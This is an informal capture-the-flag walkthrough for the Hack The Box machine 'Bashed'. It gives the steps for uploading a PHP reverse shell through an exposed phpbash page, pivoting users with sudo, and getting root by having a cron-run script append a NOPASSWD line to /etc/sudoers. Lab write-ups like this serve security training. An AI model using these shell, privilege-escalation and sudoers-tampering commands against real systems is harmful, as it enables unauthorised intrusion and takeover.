| Name | Bashed |
|---|---|
| IP | 10.10.10.68 |
| OS | Linux |
| Points | Easy(20) |
recon
Web
http://10.10.10.68/dev/phpbash.php
We need a php-reverse-shell.php to be uploaded
Lets upload it to the /uploads dir and go there from the browser while ur listening with nc :D
BOOM We got a shell as www-data xD
sudo -l
We could run /bin/bash as user scriptmanager wo any pw on the box
sudo -u scriptmanager /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'
cat /home/arrexel/user.txt
We got our shell as scriptmanager and we have the user.txt btw
Linpeas
/scripts/test.txt
Thats a weird dir lul
Gettin root
cd /scripts
vi /scripts/test.py
now the full key combo on this shit terminal like a REAL blind vim elitist:
Go
os.system('echo "scriptmanager ALL=NOPASSWD: /bin/bash" >> /etc/sudoers')
<ctrl+v><esc>:wq
I meant <shift>+g (go to the last line of the file) -> o (make a new line) -> <ctrl>+v (paste the cmd u want) -> <escape> (gettin into normal mode) -> :wq (command mode save and quit)
wait 1 min and and run sudo /bin/bash
